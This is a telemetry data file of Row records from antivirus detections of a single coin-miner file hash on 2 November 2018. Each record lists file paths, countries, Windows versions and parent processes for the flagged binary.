  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\AppData\\Roaming\\miner.crypto.tm\\miners\\Win\\Equihash\\Ewbf\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Programs\\miner.crypto.tm\\Crypto Miner.exe', parentsize=67460040, timestamp='2018-11-02T00:31:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-113152-59a60933', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5a2ec167\\AVSCAN-20181102-113121-54683BD5\\AVSCAN-20181102-113152-59A60933', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:31:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-082258-232a02fc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ea1254c4\\AVSCAN-20181102-082208-1984215B\\AVSCAN-20181102-082258-232A02FC', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='NO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:22:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-141343-2ff36ded', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_411d480d\\AVSCAN-20181102-140425-E8AF0EDA\\AVSCAN-20181102-141343-2FF36DED', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='MD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:13:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='\\\\?\\C:\\$RECYCLE.BIN\\S-1-5-21-153897562-1265273997-1534562455-1001\\$R6KQHBJ\\bin_3rdparty\\ewbf\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='CA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T09:20:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-105652-7381deb5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a4a2b196\\AVSCAN-20181102-105058-296886CB\\AVSCAN-20181102-105652-7381DEB5', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='KZ', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='E:\\White Backup\\Desktop\\Zcash Miner\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='PR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T02:41:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-182021-2c949807', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_244c8d5a\\AVSCAN-20181102-182008-2A2D89FD\\AVSCAN-20181102-182021-2C949807', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T17:20:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-013245-bb005c83', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-013241-BA30844D\\AVSCAN-20181102-013245-BB005C83', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T00:32:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='E:\\Users\\X\\Desktop\\ZEN Miner\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:09:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-013159-b153ecc0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2084602e\\AVSCAN-20181102-013142-ADB29A30\\AVSCAN-20181102-013159-B153ECC0', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T00:32:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-013246-bb4358c7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-013241-BA30844D\\AVSCAN-20181102-013246-BB4358C7', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T00:32:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='E:\\Users\\X\\Desktop\\ZEN Miner\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:47:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msiexec64.exe', filepath='C:\\Program Files (x86)\\Common Files\\HTTPERR\\MsiexeC64.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T22:38:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-110147-b161bcee', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a4a2b196\\AVSCAN-20181102-105058-296886CB\\AVSCAN-20181102-110147-B161BCEE', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='KZ', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:01:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-162128-e2d73994', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_24e655c8\\AVSCAN-20181102-162112-DF221678\\AVSCAN-20181102-162128-E2D73994', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='PR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T20:22:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-105734-7c5ec055', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a4a2b196\\AVSCAN-20181102-105058-296886CB\\AVSCAN-20181102-105734-7C5EC055', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='KZ', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:57:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-125438-741a0931', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_31eb5e36\\AVSCAN-20181102-125311-63F4AB26\\AVSCAN-20181102-125438-741A0931', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='HU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T11:54:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa6028.34678\\miners\\c_ewbfcudaminer\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\cgm_1.5.2.rar\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\WinRAR\\WinRAR.exe', parentsize=2232776, timestamp='2018-11-02T03:13:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-153748-5fc372b1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_37cc023a\\AVSCAN-20181102-153728-5C004440\\AVSCAN-20181102-153748-5FC372B1', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T14:37:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='zminer.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa6028.34678\\miners\\ccminerAlexis78\\zminer.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\cgm_1.5.2.rar\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\WinRAR\\WinRAR.exe', parentsize=2232776, timestamp='2018-11-02T03:12:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-105710-776f26a0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a4a2b196\\AVSCAN-20181102-105058-296886CB\\AVSCAN-20181102-105710-776F26A0', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='KZ', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:57:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='185552321.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\185552321.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='\\\\\\/DB', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\IObit\\Driver Booster\\6.0.2\\MlwScan.exe', parentsize=690960, timestamp='2018-11-02T17:55:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msiexec64.exe', filepath='C:\\Program Files (x86)\\Common Files\\HTTPERR\\MsiexeC64.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T03:37:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\$Recycle.Bin\\S-1-5-21-1571694585-2953821203-2531563643-1001\\$R850X49.8\\bin_3rdparty\\ewbf\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='EULA', country='CZ', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='D:\\Downloads\\esetonlinescanner_csy.exe', parentsize=6980216, timestamp='2018-11-02T16:07:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\Downloads\\nhm_windows_1.9.0.7\\bin_3rdparty\\ewbf\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='HU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\nhm_windows_1.9.0.7\\NiceHashMinerLegacy.exe', parentsize=1468416, timestamp='2018-11-02T11:52:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='nmworker.exe', filepath='C:\\Users\\X\\AppData\\Roaming\\.micro_miner\\resources\\nvidia\\18\\nmworker.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='\\\\\\/minimized', country='PA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Micro Miner\\MicroMiner.exe', parentsize=578048, timestamp='2018-11-02T13:14:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-072208-9344ed5e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b7367272\\AVSCAN-20181102-072106-8AAF118B\\AVSCAN-20181102-072208-9344ED5E', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='PA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:22:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Program Files (x86)\\BetterHash\\Cores\\ewbf\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='-DOWNLOADCORES', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\BetterHash\\BetterHash.exe', parentsize=13204056, timestamp='2018-11-02T09:18:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\AppData\\Roaming\\miner.crypto.tm\\miners\\Win\\Equihash\\Ewbf\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='--updated', country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Programs\\miner.crypto.tm\\Crypto Miner.exe', parentsize=67460040, timestamp='2018-11-02T14:37:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msiexec64.exe', filepath='C:\\Program Files (x86)\\Common Files\\NTServices\\mSiexec64.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T03:37:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-082306-8c65d68a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_90a320b9\\AVSCAN-20181102-082223-82AAC5F3\\AVSCAN-20181102-082306-8C65D68A', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='NO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:23:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\Desktop\\nhm_windows_1.9.0.4\\bin_3rdparty\\ewbf\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe63_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe63 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='NO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-02T07:23:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='E:\\Users\\X\\Desktop\\ZEN Miner\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:52:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='E:\\Users\\X\\Desktop\\ZEN Miner\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:12:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-174941-659cb4a7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e16ecb17\\AVSCAN-20181102-174924-62EC54D7\\AVSCAN-20181102-174941-659CB4A7', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T16:49:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='idlemonitor.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\{GBZYE-21BYK-T9UAE-5L03E-KBTFX-XRY8T}\\idlemonitor.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T22:31:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-162102-dccd488d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_24e655c8\\AVSCAN-20181102-162044-D899213A\\AVSCAN-20181102-162102-DCCD488D', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='PR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T20:21:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='162059228.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\162059228.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='\\\\\\/DB', country='PR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\IObit\\Driver Booster\\6.0.2\\MlwScan.exe', parentsize=690960, timestamp='2018-11-02T20:21:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='162037232.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\162037232.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='\\\\\\/DB', country='PR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\IObit\\Driver Booster\\6.0.2\\MlwScan.exe', parentsize=690960, timestamp='2018-11-02T20:21:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\Desktop\\Mining\\0.3.4b\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T20:53:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='\\\\?\\C:\\Users\\X\\Miners\\0.3.4b\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='IL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T20:26:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\Downloads\\Compressed\\Equihash\\NVIDIA\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='x -iext -ow -ver -- \\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Compressed\\\\\\\\Setup.zip\\\\\\" C:\\\\\\\\Users\\\\\\\\Eng.Ramy\\\\\\\\Downloads\\\\\\\\Compressed\\\\\\\\', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\WinRAR\\WinRAR.exe', parentsize=1037824, timestamp='2018-11-02T20:54:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='E:\\Users\\X\\Desktop\\ZEN Miner\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T20:57:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181101-224303-3813d996', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_dbe9e11c\\AVSCAN-20181101-224249-354725F3\\AVSCAN-20181101-224303-3813D996', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='PR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T02:42:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-110548-e3f43126', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a4a2b196\\AVSCAN-20181102-105058-296886CB\\AVSCAN-20181102-110548-E3F43126', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='KZ', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:05:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-181000-ab281ce7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c26078a1\\AVSCAN-20181102-180940-A7E6A8C2\\AVSCAN-20181102-181000-AB281CE7', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T15:10:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-112020-eb6df745', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_35c473c1\\AVSCAN-20181102-111947-E5B30F1E\\AVSCAN-20181102-112020-EB6DF745', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:20:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='E:\\Users\\X\\Desktop\\ZEN Miner\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:56:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-102851-795fa873', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_26d8c8c1\\AVSCAN-20181102-102759-706FF287\\AVSCAN-20181102-102851-795FA873', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:28:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='idlemonitor.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\{QUFHK-NZMSK-GVF6K-OYUUZ-3DLD3-8ULCA}\\idlemonitor.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:40:36Z'), dt=datetime.date(2018, 11, 2)),
